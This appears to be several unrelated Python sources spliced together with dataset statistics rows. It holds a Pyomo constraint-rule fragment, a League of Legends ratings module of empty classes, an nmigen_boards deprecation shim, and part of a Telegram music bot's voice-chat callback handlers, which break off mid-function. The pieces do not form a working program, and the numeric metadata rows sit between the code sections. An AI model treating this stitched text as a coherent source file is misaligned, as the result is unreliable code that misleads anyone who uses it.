return m.ecwin_l[it, jt] * m.Ax + m.Sit[it, jt] * m.hsint[it, jt] == m.eein_l[it, jt] * m.Ax + m.Sot[it, jt] * m.hse_l[it, jt]
else:
return Constraint.Skip
# ccwin or cein
def bc_mol0_rule(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return m.ccwin[it, jt, 1, 0, c] == m.cein[it, jt, 1, 0, c]
else:
return Constraint.Skip
# ecwin or eein
def bc_ene0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.ecwin[it, jt, 1, 0] == m.eein[it, jt, 1, 0]
else:
return Constraint.Skip
# z0
def bc_z0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.z[it, jt, 1, 0] == 0
else:
return Constraint.Skip
# HXIn_h
def bc_hxh_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.hxh_l[it, jt] == m.HXIn_h[it, jt]
else:
return Constraint.Skip
# Phx_l
def bc_phx_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.Phx_l[it, jt] == m.HXIn_P
else:
return Constraint.Skip
def ic_Gb_rule(m, ix, jx):
    # Initial condition: fix vg at the first time element/point
    # (it=1, jt=0) to the supplied initial profile vg_ic.
    # NOTE(review): the rule name says Gb but it initializes vg — confirm
    # the intended name/variable pairing.
    if 0 < jx <= m.ncp_x:
        return m.vg[1, 0, ix, jx] == m.vg_ic[(ix, jx)]
    else:
        return Constraint.Skip
| 35.523684
| 261
| 0.483814
| 13,530
| 67,495
| 2.326016
| 0.040355
| 0.104604
| 0.137269
| 0.176416
| 0.88116
| 0.853325
| 0.819294
| 0.793302
| 0.746592
| 0.707095
| 0
| 0.038413
| 0.314231
| 67,495
| 1,899
| 262
| 35.542391
| 0.641511
| 0.06033
| 0
| 0.511295
| 0
| 0
| 0.001808
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165663
| false
| 0
| 0.003012
| 0.004518
| 0.49247
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37f2985dc87131d69e6852420f6279afaec8a3b5
| 7,373
|
py
|
Python
|
loldib/getratings/models/NA/na_fiddlesticks/na_fiddlesticks_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_fiddlesticks/na_fiddlesticks_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_fiddlesticks/na_fiddlesticks_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Fiddlesticks_Mid_Aatrox(Ratings):
pass
class NA_Fiddlesticks_Mid_Ahri(Ratings):
pass
class NA_Fiddlesticks_Mid_Akali(Ratings):
pass
class NA_Fiddlesticks_Mid_Alistar(Ratings):
pass
class NA_Fiddlesticks_Mid_Amumu(Ratings):
pass
class NA_Fiddlesticks_Mid_Anivia(Ratings):
pass
class NA_Fiddlesticks_Mid_Annie(Ratings):
pass
class NA_Fiddlesticks_Mid_Ashe(Ratings):
pass
class NA_Fiddlesticks_Mid_AurelionSol(Ratings):
pass
class NA_Fiddlesticks_Mid_Azir(Ratings):
pass
class NA_Fiddlesticks_Mid_Bard(Ratings):
pass
class NA_Fiddlesticks_Mid_Blitzcrank(Ratings):
pass
class NA_Fiddlesticks_Mid_Brand(Ratings):
pass
class NA_Fiddlesticks_Mid_Braum(Ratings):
pass
class NA_Fiddlesticks_Mid_Caitlyn(Ratings):
pass
class NA_Fiddlesticks_Mid_Camille(Ratings):
pass
class NA_Fiddlesticks_Mid_Cassiopeia(Ratings):
pass
class NA_Fiddlesticks_Mid_Chogath(Ratings):
pass
class NA_Fiddlesticks_Mid_Corki(Ratings):
pass
class NA_Fiddlesticks_Mid_Darius(Ratings):
pass
class NA_Fiddlesticks_Mid_Diana(Ratings):
pass
class NA_Fiddlesticks_Mid_Draven(Ratings):
pass
class NA_Fiddlesticks_Mid_DrMundo(Ratings):
pass
class NA_Fiddlesticks_Mid_Ekko(Ratings):
pass
class NA_Fiddlesticks_Mid_Elise(Ratings):
pass
class NA_Fiddlesticks_Mid_Evelynn(Ratings):
pass
class NA_Fiddlesticks_Mid_Ezreal(Ratings):
pass
class NA_Fiddlesticks_Mid_Fiddlesticks(Ratings):
pass
class NA_Fiddlesticks_Mid_Fiora(Ratings):
pass
class NA_Fiddlesticks_Mid_Fizz(Ratings):
pass
class NA_Fiddlesticks_Mid_Galio(Ratings):
pass
class NA_Fiddlesticks_Mid_Gangplank(Ratings):
pass
class NA_Fiddlesticks_Mid_Garen(Ratings):
pass
class NA_Fiddlesticks_Mid_Gnar(Ratings):
pass
class NA_Fiddlesticks_Mid_Gragas(Ratings):
pass
class NA_Fiddlesticks_Mid_Graves(Ratings):
pass
class NA_Fiddlesticks_Mid_Hecarim(Ratings):
pass
class NA_Fiddlesticks_Mid_Heimerdinger(Ratings):
pass
class NA_Fiddlesticks_Mid_Illaoi(Ratings):
pass
class NA_Fiddlesticks_Mid_Irelia(Ratings):
pass
class NA_Fiddlesticks_Mid_Ivern(Ratings):
pass
class NA_Fiddlesticks_Mid_Janna(Ratings):
pass
class NA_Fiddlesticks_Mid_JarvanIV(Ratings):
pass
class NA_Fiddlesticks_Mid_Jax(Ratings):
pass
class NA_Fiddlesticks_Mid_Jayce(Ratings):
pass
class NA_Fiddlesticks_Mid_Jhin(Ratings):
pass
class NA_Fiddlesticks_Mid_Jinx(Ratings):
pass
class NA_Fiddlesticks_Mid_Kalista(Ratings):
pass
class NA_Fiddlesticks_Mid_Karma(Ratings):
pass
class NA_Fiddlesticks_Mid_Karthus(Ratings):
pass
class NA_Fiddlesticks_Mid_Kassadin(Ratings):
pass
class NA_Fiddlesticks_Mid_Katarina(Ratings):
pass
class NA_Fiddlesticks_Mid_Kayle(Ratings):
pass
class NA_Fiddlesticks_Mid_Kayn(Ratings):
pass
class NA_Fiddlesticks_Mid_Kennen(Ratings):
pass
class NA_Fiddlesticks_Mid_Khazix(Ratings):
pass
class NA_Fiddlesticks_Mid_Kindred(Ratings):
pass
class NA_Fiddlesticks_Mid_Kled(Ratings):
pass
class NA_Fiddlesticks_Mid_KogMaw(Ratings):
pass
class NA_Fiddlesticks_Mid_Leblanc(Ratings):
pass
class NA_Fiddlesticks_Mid_LeeSin(Ratings):
pass
class NA_Fiddlesticks_Mid_Leona(Ratings):
pass
class NA_Fiddlesticks_Mid_Lissandra(Ratings):
pass
class NA_Fiddlesticks_Mid_Lucian(Ratings):
pass
class NA_Fiddlesticks_Mid_Lulu(Ratings):
pass
class NA_Fiddlesticks_Mid_Lux(Ratings):
pass
class NA_Fiddlesticks_Mid_Malphite(Ratings):
pass
class NA_Fiddlesticks_Mid_Malzahar(Ratings):
pass
class NA_Fiddlesticks_Mid_Maokai(Ratings):
pass
class NA_Fiddlesticks_Mid_MasterYi(Ratings):
pass
class NA_Fiddlesticks_Mid_MissFortune(Ratings):
pass
class NA_Fiddlesticks_Mid_MonkeyKing(Ratings):
pass
class NA_Fiddlesticks_Mid_Mordekaiser(Ratings):
pass
class NA_Fiddlesticks_Mid_Morgana(Ratings):
pass
class NA_Fiddlesticks_Mid_Nami(Ratings):
pass
class NA_Fiddlesticks_Mid_Nasus(Ratings):
pass
class NA_Fiddlesticks_Mid_Nautilus(Ratings):
pass
class NA_Fiddlesticks_Mid_Nidalee(Ratings):
pass
class NA_Fiddlesticks_Mid_Nocturne(Ratings):
pass
class NA_Fiddlesticks_Mid_Nunu(Ratings):
pass
class NA_Fiddlesticks_Mid_Olaf(Ratings):
pass
class NA_Fiddlesticks_Mid_Orianna(Ratings):
pass
class NA_Fiddlesticks_Mid_Ornn(Ratings):
pass
class NA_Fiddlesticks_Mid_Pantheon(Ratings):
pass
class NA_Fiddlesticks_Mid_Poppy(Ratings):
pass
class NA_Fiddlesticks_Mid_Quinn(Ratings):
pass
class NA_Fiddlesticks_Mid_Rakan(Ratings):
pass
class NA_Fiddlesticks_Mid_Rammus(Ratings):
pass
class NA_Fiddlesticks_Mid_RekSai(Ratings):
pass
class NA_Fiddlesticks_Mid_Renekton(Ratings):
pass
class NA_Fiddlesticks_Mid_Rengar(Ratings):
pass
class NA_Fiddlesticks_Mid_Riven(Ratings):
pass
class NA_Fiddlesticks_Mid_Rumble(Ratings):
pass
class NA_Fiddlesticks_Mid_Ryze(Ratings):
pass
class NA_Fiddlesticks_Mid_Sejuani(Ratings):
pass
class NA_Fiddlesticks_Mid_Shaco(Ratings):
pass
class NA_Fiddlesticks_Mid_Shen(Ratings):
pass
class NA_Fiddlesticks_Mid_Shyvana(Ratings):
pass
class NA_Fiddlesticks_Mid_Singed(Ratings):
pass
class NA_Fiddlesticks_Mid_Sion(Ratings):
pass
class NA_Fiddlesticks_Mid_Sivir(Ratings):
pass
class NA_Fiddlesticks_Mid_Skarner(Ratings):
pass
class NA_Fiddlesticks_Mid_Sona(Ratings):
pass
class NA_Fiddlesticks_Mid_Soraka(Ratings):
pass
class NA_Fiddlesticks_Mid_Swain(Ratings):
pass
class NA_Fiddlesticks_Mid_Syndra(Ratings):
pass
class NA_Fiddlesticks_Mid_TahmKench(Ratings):
pass
class NA_Fiddlesticks_Mid_Taliyah(Ratings):
pass
class NA_Fiddlesticks_Mid_Talon(Ratings):
pass
class NA_Fiddlesticks_Mid_Taric(Ratings):
pass
class NA_Fiddlesticks_Mid_Teemo(Ratings):
pass
class NA_Fiddlesticks_Mid_Thresh(Ratings):
pass
class NA_Fiddlesticks_Mid_Tristana(Ratings):
pass
class NA_Fiddlesticks_Mid_Trundle(Ratings):
pass
class NA_Fiddlesticks_Mid_Tryndamere(Ratings):
pass
class NA_Fiddlesticks_Mid_TwistedFate(Ratings):
pass
class NA_Fiddlesticks_Mid_Twitch(Ratings):
pass
class NA_Fiddlesticks_Mid_Udyr(Ratings):
pass
class NA_Fiddlesticks_Mid_Urgot(Ratings):
pass
class NA_Fiddlesticks_Mid_Varus(Ratings):
pass
class NA_Fiddlesticks_Mid_Vayne(Ratings):
pass
class NA_Fiddlesticks_Mid_Veigar(Ratings):
pass
class NA_Fiddlesticks_Mid_Velkoz(Ratings):
pass
class NA_Fiddlesticks_Mid_Vi(Ratings):
pass
class NA_Fiddlesticks_Mid_Viktor(Ratings):
pass
class NA_Fiddlesticks_Mid_Vladimir(Ratings):
pass
class NA_Fiddlesticks_Mid_Volibear(Ratings):
pass
class NA_Fiddlesticks_Mid_Warwick(Ratings):
pass
class NA_Fiddlesticks_Mid_Xayah(Ratings):
pass
class NA_Fiddlesticks_Mid_Xerath(Ratings):
pass
class NA_Fiddlesticks_Mid_XinZhao(Ratings):
pass
class NA_Fiddlesticks_Mid_Yasuo(Ratings):
pass
class NA_Fiddlesticks_Mid_Yorick(Ratings):
pass
class NA_Fiddlesticks_Mid_Zac(Ratings):
pass
class NA_Fiddlesticks_Mid_Zed(Ratings):
pass
class NA_Fiddlesticks_Mid_Ziggs(Ratings):
pass
class NA_Fiddlesticks_Mid_Zilean(Ratings):
pass
class NA_Fiddlesticks_Mid_Zyra(Ratings):
pass
| 17.681055
| 49
| 0.792893
| 972
| 7,373
| 5.588477
| 0.151235
| 0.177835
| 0.482695
| 0.55891
| 0.83229
| 0.83229
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150685
| 7,373
| 416
| 50
| 17.723558
| 0.867454
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
5306ac14c5741775af37d169c4026ce82754e8e9
| 259
|
py
|
Python
|
nmigen_boards/te0714_03_50_2I.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 11
|
2021-12-10T12:23:29.000Z
|
2022-03-13T08:40:20.000Z
|
nmigen_boards/te0714_03_50_2I.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 12
|
2021-12-11T18:51:29.000Z
|
2022-03-12T05:08:52.000Z
|
nmigen_boards/te0714_03_50_2I.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 7
|
2021-12-12T07:20:21.000Z
|
2022-03-06T06:20:55.000Z
|
from amaranth_boards.te0714_03_50_2I import *
from amaranth_boards.te0714_03_50_2I import __all__
import warnings
warnings.warn("instead of nmigen_boards.te0714_03_50_2I, use amaranth_boards.te0714_03_50_2I",
DeprecationWarning, stacklevel=2)
| 32.375
| 94
| 0.818533
| 39
| 259
| 4.923077
| 0.461538
| 0.25
| 0.291667
| 0.333333
| 0.604167
| 0.510417
| 0.375
| 0.375
| 0
| 0
| 0
| 0.163717
| 0.127413
| 259
| 7
| 95
| 37
| 0.685841
| 0
| 0
| 0
| 0
| 0
| 0.297297
| 0.235521
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
728ba80af3290a33bef05998d02e43a8721be80e
| 42,835
|
py
|
Python
|
Yukki/Plugins/callback.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | null | null | null |
Yukki/Plugins/callback.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | null | null | null |
Yukki/Plugins/callback.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | 1
|
2021-12-01T10:17:55.000Z
|
2021-12-01T10:17:55.000Z
|
from pyrogram import Client, filters
from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InputMediaPhoto,
Message,
)
from asyncio import QueueEmpty
from pyrogram import Client, filters
from Yukki import app, BOT_USERNAME, dbb, SUDOERS
import os
import youtube_dl
from youtubesearchpython import VideosSearch
from Yukki.config import LOG_GROUP_ID
from ..YukkiUtilities.tgcallsrun import ASS_ACC
from os import path
import random
import time as sedtime
import asyncio
import shutil
from time import time
import youtube_dl
from .. import converter
import aiohttp
from aiohttp import ClientResponseError, ServerTimeoutError, TooManyRedirects
from Yukki import dbb, app, BOT_USERNAME, BOT_ID, ASSID, ASSNAME, ASSUSERNAME, ASSMENTION
from Yukki.YukkiUtilities.tgcallsrun import (yukki, convert, download, clear, get, is_empty, put, task_done, smexy)
from ..YukkiUtilities.tgcallsrun import (yukki, convert, download, clear, get, is_empty, put, task_done)
from Yukki.YukkiUtilities.helpers.decorators import errors
from Yukki.YukkiUtilities.helpers.filters import command, other_filters
from Yukki.YukkiUtilities.helpers.paste import paste
from Yukki.YukkiUtilities.tgcallsrun import (yukki, clear, get, is_empty, put, task_done)
from Yukki.YukkiUtilities.database.queue import (is_active_chat, add_active_chat, remove_active_chat, music_on, is_music_playing, music_off)
from Yukki.YukkiUtilities.database.playlist import (get_playlist_count, _get_playlists, get_note_names, get_playlist, save_playlist, delete_playlist)
from Yukki.YukkiUtilities.database.assistant import (_get_assistant, get_assistant, save_assistant)
from Yukki.YukkiUtilities.helpers.inline import (play_keyboard, search_markup, play_markup, playlist_markup, audio_markup)
from Yukki.YukkiUtilities.helpers.inline import play_keyboard, confirm_keyboard, play_list_keyboard, close_keyboard, confirm_group_keyboard
from Yukki.YukkiUtilities.tgcallsrun import (yukki, convert, download, clear, get, is_empty, put, task_done, smexy)
from Yukki.YukkiUtilities.database.queue import (is_active_chat, add_active_chat, remove_active_chat, music_on, is_music_playing, music_off)
from Yukki.YukkiUtilities.database.onoff import (is_on_off, add_on, add_off)
from Yukki.YukkiUtilities.database.blacklistchat import (blacklisted_chats, blacklist_chat, whitelist_chat)
from Yukki.YukkiUtilities.database.gbanned import (get_gbans_count, is_gbanned_user, add_gban_user, add_gban_user)
from Yukki.YukkiUtilities.database.theme import (_get_theme, get_theme, save_theme)
from Yukki.YukkiUtilities.database.assistant import (_get_assistant, get_assistant, save_assistant)
from ..config import DURATION_LIMIT, ASS_ID
from ..YukkiUtilities.helpers.decorators import errors
from ..YukkiUtilities.helpers.filters import command
from ..YukkiUtilities.helpers.gets import (get_url, themes, random_assistant, ass_det)
from ..YukkiUtilities.helpers.thumbnails import gen_thumb
from ..YukkiUtilities.helpers.chattitle import CHAT_TITLE
from ..YukkiUtilities.helpers.ytdl import ytdl_opts
from ..YukkiUtilities.helpers.inline import (play_keyboard, search_markup, play_markup, playlist_markup)
import requests
from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InputMediaPhoto,
Message,
)
import re
import aiofiles
from pykeyboard import InlineKeyboard
from pyrogram import filters
from Yukki import aiohttpsession as session
# Content-Type values that can be rendered as text (text/*, json, yaml, xml,
# toml, shell scripts) — presumably used by the paste/preview logic; TODO
# confirm against callers (this module never references it directly).
pattern = re.compile(
    r"^text/|json$|yaml$|xml$|toml$|x-sh$|x-shellscript$"
)
# Shared throttle state for youtube_dl progress hooks, keyed by a download's
# total byte count; values step through 1..4 to rate-limit status-message edits.
flex = {}
async def isPreviewUp(preview: str) -> bool:
    """Poll *preview* (an image URL) until it is being served; up to 7 tries.

    Issues HEAD requests with a 2-second timeout.  A 404, or a 200 with an
    empty body, means the paste service has not rendered the preview yet, so
    wait 0.4 s and retry.  Returns True once a non-empty 200 response is
    seen; False on timeout, on any other status, or when retries run out.
    """
    for _ in range(7):
        try:
            async with session.head(preview, timeout=2) as resp:
                status = resp.status
                size = resp.content_length
        except asyncio.exceptions.TimeoutError:
            return False
        if status == 404 or (status == 200 and size == 0):
            # Not ready yet — give the paste service a moment to render it.
            await asyncio.sleep(0.4)
        else:
            # Idiom fix: the comparison already yields the bool we want
            # (was `return True if status == 200 else False`).
            return status == 200
    return False
@Client.on_callback_query(filters.regex(pattern=r"ppcl"))
async def closesmex(_, CallbackQuery):
    """Close-button handler: only the original requester may delete the message."""
    data = CallbackQuery.data.strip()
    cid = CallbackQuery.message.chat.id
    payload = data.split(None, 1)[1]
    presser_id = CallbackQuery.from_user.id
    try:
        smex, user_id = payload.split("|")
    except Exception as e:
        await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**:{e}")
        return
    if int(user_id) != presser_id:
        await CallbackQuery.answer("You're not allowed to close this Nigga", show_alert=True)
        return
    await CallbackQuery.message.delete()
    await CallbackQuery.answer()
@Client.on_callback_query(filters.regex("pausevc"))
async def pausevc(_, CallbackQuery):
    """Pause the running voice-chat stream (inline button handler).

    Requires the pressing user to hold the "manage voice chats" right.
    Cleanup: removed the unused `checking` local, flattened the nesting into
    guard clauses, and dropped placeholder-free f-string prefixes.
    """
    member = await app.get_chat_member(CallbackQuery.message.chat.id, CallbackQuery.from_user.id)
    if not member.can_manage_voice_chats:
        return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
    chat_id = CallbackQuery.message.chat.id
    if not await is_active_chat(chat_id):
        await CallbackQuery.answer("Nothing's playing on MUNNA X MUSIC", show_alert=True)
        return
    if not await is_music_playing(chat_id):
        await CallbackQuery.answer("Nothing's playing on MUNNA X MUSIC!", show_alert=True)
        return
    # NOTE(review): pause_stream is called without await, matching the
    # original code — confirm against the installed pytgcalls API.
    yukki.pytgcalls.pause_stream(chat_id)
    await music_off(chat_id)
    await CallbackQuery.answer("Voicechat Paused", show_alert=True)
    user_id = CallbackQuery.from_user.id
    user_name = CallbackQuery.from_user.first_name
    rpk = f"[{user_name}](tg://user?id={user_id})"
    await CallbackQuery.message.reply(f"🎧 Voicechat Paused by {rpk}!", reply_markup=play_keyboard)
    await CallbackQuery.message.delete()
@Client.on_callback_query(filters.regex("resumevc"))
async def resumevc(_, CallbackQuery):
    """Resume a paused voice-chat stream (inline button handler)."""
    member = await app.get_chat_member(CallbackQuery.message.chat.id, CallbackQuery.from_user.id)
    if not member.can_manage_voice_chats:
        return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
    chat_id = CallbackQuery.message.chat.id
    if not await is_active_chat(chat_id):
        await CallbackQuery.answer(f"Nothing's playing on MUNNA X MUSIC!", show_alert=True)
        return
    if await is_music_playing(chat_id):
        await CallbackQuery.answer("I dont think if something's paused on voice chat", show_alert=True)
        return
    await music_on(chat_id)
    yukki.pytgcalls.resume_stream(chat_id)
    await CallbackQuery.answer("Voicechat Resumed", show_alert=True)
    requester_id = CallbackQuery.from_user.id
    requester_name = CallbackQuery.from_user.first_name
    mention = "[" + requester_name + "](tg://user?id=" + str(requester_id) + ")"
    await CallbackQuery.message.reply(f"🎧 Voicechat Resumed by {mention}!", reply_markup=play_keyboard)
    await CallbackQuery.message.delete()
@Client.on_callback_query(filters.regex("skipvc"))
async def skipvc(_,CallbackQuery):
    # Skip button: pops the current track from the queue.  If the queue is
    # then empty the bot leaves the voice chat; otherwise the next entry is
    # streamed (downloading it first when it is a YouTube id, i.e. when the
    # stored file id does not start with "raw").
    a = await app.get_chat_member(CallbackQuery.message.chat.id , CallbackQuery.from_user.id)
    if not a.can_manage_voice_chats:
        return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
    checking = CallbackQuery.from_user.first_name
    chat_id = CallbackQuery.message.chat.id
    chat_title = CallbackQuery.message.chat.title
    if await is_active_chat(chat_id):
        task_done(CallbackQuery.message.chat.id)
        if is_empty(CallbackQuery.message.chat.id):
            # Queue exhausted: announce and leave the voice chat.
            user_id = CallbackQuery.from_user.id
            await remove_active_chat(chat_id)
            user_name = CallbackQuery.from_user.first_name
            rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
            await remove_active_chat(chat_id)
            await CallbackQuery.answer()
            await CallbackQuery.message.reply(f"**__Skip Button Used By__** {rpk}\n\nNo more music in __Queues__ \n\nLeaving Voice Chat")
            yukki.pytgcalls.leave_group_call(CallbackQuery.message.chat.id)
            return
        else:
            await CallbackQuery.answer("Voicechat Skipped", show_alert=True)
            afk = get(chat_id)['file']
            # First three characters of the stored file id distinguish an
            # already-downloaded "raw" file from a YouTube video id.
            f1 = (afk[0])
            f2 = (afk[1])
            f3 = (afk[2])
            finxx = (f"{f1}{f2}{f3}")
            if str(finxx) != "raw":
                mystic = await CallbackQuery.message.reply("MUNNA X MUSIC is currently playing Playlist...\n\nDownloading Next Music From Playlist....")
                url = (f"https://www.youtube.com/watch?v={afk}")
                try:
                    with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
                        x = ytdl.extract_info(url, download=False)
                except Exception as e:
                    return await mystic.edit(f"Failed to download this video.\n\n**Reason**:{e}")
                title = (x["title"])
                videoid = afk
                def my_hook(d):
                    # youtube_dl progress hook (runs in the executor thread):
                    # edits the status message at a few download milestones,
                    # throttled via the module-level `flex` dict keyed by the
                    # download's total byte count.
                    if d['status'] == 'downloading':
                        percentage = d['_percent_str']
                        per = (str(percentage)).replace(".","", 1).replace("%","", 1)
                        per = int(per)
                        eta = d['eta']
                        speed = d['_speed_str']
                        size = d['_total_bytes_str']
                        bytesx = d['total_bytes']
                        if str(bytesx) in flex:
                            pass
                        else:
                            flex[str(bytesx)] = 1
                        if flex[str(bytesx)] == 1:
                            flex[str(bytesx)] += 1
                            sedtime.sleep(1)
                            mystic.edit(f"Downloading {title[:50]}\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                        if per > 500:
                            if flex[str(bytesx)] == 2:
                                flex[str(bytesx)] += 1
                                sedtime.sleep(0.5)
                                mystic.edit(f"Downloading {title[:50]}...\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
                        if per > 800:
                            if flex[str(bytesx)] == 3:
                                flex[str(bytesx)] += 1
                                sedtime.sleep(0.5)
                                mystic.edit(f"Downloading {title[:50]}....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
                        if per == 1000:
                            if flex[str(bytesx)] == 4:
                                # Cycle back to 1 so the entry can be reused.
                                flex[str(bytesx)] = 1
                                sedtime.sleep(0.5)
                                mystic.edit(f"Downloading {title[:50]}.....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
                # Blocking download runs in the default executor.
                loop = asyncio.get_event_loop()
                xx = await loop.run_in_executor(None, download, url, my_hook)
                file = await convert(xx)
                yukki.pytgcalls.change_stream(chat_id, file)
                thumbnail = (x["thumbnail"])
                duration = (x["duration"])
                duration = round(x["duration"] / 60)
                theme = random.choice(themes)
                ctitle = (await app.get_chat(chat_id)).title
                ctitle = await CHAT_TITLE(ctitle)
                # Requester id was persisted by the queueing handler.
                f2 = open(f'search/{afk}id.txt', 'r')
                userid =(f2.read())
                thumb = await gen_thumb(thumbnail, title, userid, theme, ctitle)
                user_id = userid
                buttons = play_markup(videoid, user_id)
                await mystic.delete()
                semx = await app.get_users(userid)
                user_id = CallbackQuery.from_user.id
                user_name = CallbackQuery.from_user.first_name
                rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
                await CallbackQuery.message.reply_photo(
                    photo= thumb,
                    reply_markup=InlineKeyboardMarkup(buttons),
                    caption=(f"<b>__Skipped Voice Chat By {rpk}__</b>\n\n🎥<b>__Started Playing:__ </b>[{title[:25]}]({url}) \n⏳<b>__Duration:__</b> {duration} Mins\n👤**__Requested by:__** {semx.mention}")
                )
                os.remove(thumb)
            else:
                # "raw" entry: already downloaded, just switch the stream and
                # rebuild the announcement from the persisted metadata files.
                yukki.pytgcalls.change_stream(chat_id, afk)
                _chat_ = ((str(afk)).replace("_","", 1).replace("/","", 1).replace(".","", 1))
                f2 = open(f'search/{_chat_}title.txt', 'r')
                title =(f2.read())
                f3 = open(f'search/{_chat_}duration.txt', 'r')
                duration =(f3.read())
                f4 = open(f'search/{_chat_}username.txt', 'r')
                username =(f4.read())
                f4 = open(f'search/{_chat_}videoid.txt', 'r')
                videoid =(f4.read())
                user_id = 1
                videoid = str(videoid)
                # "smex1" marks an audio-file entry rather than a video.
                if videoid == "smex1":
                    buttons = audio_markup(videoid, user_id)
                else:
                    buttons = play_markup(videoid, user_id)
                user_id = CallbackQuery.from_user.id
                user_name = CallbackQuery.from_user.first_name
                rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
                await CallbackQuery.message.reply_photo(
                    photo=f"downloads/{_chat_}final.png",
                    reply_markup=InlineKeyboardMarkup(buttons),
                    caption=f"<b>__Skipped Voice Chat By {rpk}__</b>\n\n🎥<b>__Started Playing:__</b> {title} \n⏳<b>__Duration:__</b> {duration} \n👤<b>__Requested by:__ </b> {username}",
                )
    return
@Client.on_callback_query(filters.regex("stopvc"))
async def stopvc(_, CallbackQuery):
    """Stop button: clear the queue, leave the call, mark the chat inactive.

    Cleanup: removed the unused `checking` local and the unused exception
    binding, and flattened the outer if/else into a guard clause.
    """
    member = await app.get_chat_member(CallbackQuery.message.chat.id, CallbackQuery.from_user.id)
    if not member.can_manage_voice_chats:
        return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
    chat_id = CallbackQuery.message.chat.id
    if not await is_active_chat(chat_id):
        await CallbackQuery.answer("Nothing's playing on Yukki!", show_alert=True)
        return
    try:
        clear(chat_id)
    except QueueEmpty:
        pass  # queue was already empty — nothing to clear
    try:
        yukki.pytgcalls.leave_group_call(chat_id)
    except Exception:
        # Best-effort: we may already have left (or never joined) the call.
        pass
    await remove_active_chat(chat_id)
    await CallbackQuery.answer("Voicechat Stopped", show_alert=True)
    user_id = CallbackQuery.from_user.id
    user_name = CallbackQuery.from_user.first_name
    rpk = f"[{user_name}](tg://user?id={user_id})"
    await CallbackQuery.message.reply(f"🎧 Voicechat End/Stopped by {rpk}!")
@Client.on_callback_query(filters.regex("play_playlist"))
async def play_playlist(_,CallbackQuery):
    # Start playback of a saved playlist.  Callback payload is
    # "<user_id>|<smex>" where smex is "personal" or "group".  For each saved
    # entry: if a stream is already active the entry is queued; otherwise the
    # entry is downloaded and streaming is started.  Afterwards the queued
    # list is pasted to a bin and posted with player control buttons.
    callback_data = CallbackQuery.data.strip()
